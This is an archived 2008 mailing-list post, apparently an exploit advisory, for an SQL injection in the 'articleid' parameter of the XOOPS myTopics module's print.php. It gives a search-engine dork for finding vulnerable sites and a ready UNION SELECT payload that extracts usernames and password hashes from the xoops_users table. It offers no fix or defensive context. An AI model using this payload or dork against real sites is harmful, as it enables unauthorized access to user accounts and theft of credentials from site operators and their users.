XOOPS Module myTopics-print SQL Injection(articleid)

hackturkiye . hackturkiye Tue, 19 Feb 2008 08:41:39 -0800

###############################################################

#


#    XOOPS Module myTopics-print SQL Injection(articleid)

#

###############################################################

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MA&#304;L : [EMAIL PROTECTED]

#        

################################################################

# 

#  DORK 1 : allinurl: "/modules/myTopics/"

# 

#  you can add expliot after mytopics  

#

################################################################

  example


  /modules/myTopics/ (exploit)   



EXPLOIT : 


print.php?articleid=-9999999/**/union/**/select+1,char(112,115,101,114),0,concat(uname,0x3a,pass),0,char(117,115,101,114,110,97,109,101,58),0,0,0,0,1,1,1,1,1,1,1,1,1,1,0,0,111,333,222,0,0,0,0/**/from%2F%2A%2A%2Fxoops_users/*%20where%20admin%201%200%201%20


################################################################

# [EMAIL PROTECTED]           i AM NOT HACKER      [EMAIL PROTECTED] 

################################################################

XOOPS Module myTopics-print SQL Injection(articleid)

Reply via email to